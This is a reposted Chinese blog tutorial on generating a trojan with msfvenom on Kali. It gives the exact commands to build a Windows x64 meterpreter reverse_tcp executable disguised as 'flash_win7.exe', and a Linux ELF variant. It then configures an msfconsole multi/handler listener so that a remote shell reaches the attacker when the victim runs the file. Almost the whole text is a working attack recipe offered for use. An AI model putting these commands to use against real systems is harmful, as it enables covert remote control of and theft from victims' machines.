转: kali msfvenom生成木马

kali msfvenom生成木马

转:https://blog.csdn.net/qq_33391644/article/details/79266724

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

1.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相应的载荷。

root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp  //linux可以对应修改

2.生成程序(默认路径是在home下)

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.80.142 lport=443 -f exe X > flash_win7.exe
//linux:msfvenom -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.1.112 LPORT=4444 -f elf >shell_x64

4.启动msfvenom

root@kali:~# msfconsole

5.通过msfconsole开始监听

root@kali:~# use exploit/multi/handler

6.设置监听的环境

root@kali:~# set payload windows/x64/meterpreter/reverse_tcp 

7.设置监听的ip

root@kali:~# set lhost 192.168.1.103

8.设置监听的端口

root@kali:~# set lport 443

9.开始监听

root@kali:~# exploit 

10.当目标运行程序的时候,便能获得shell.

之后进入meterpreter,应用命令:sysinfo即可获取目标信息。

原文地址:https://www.cnblogs.com/studyskill/p/8920522.html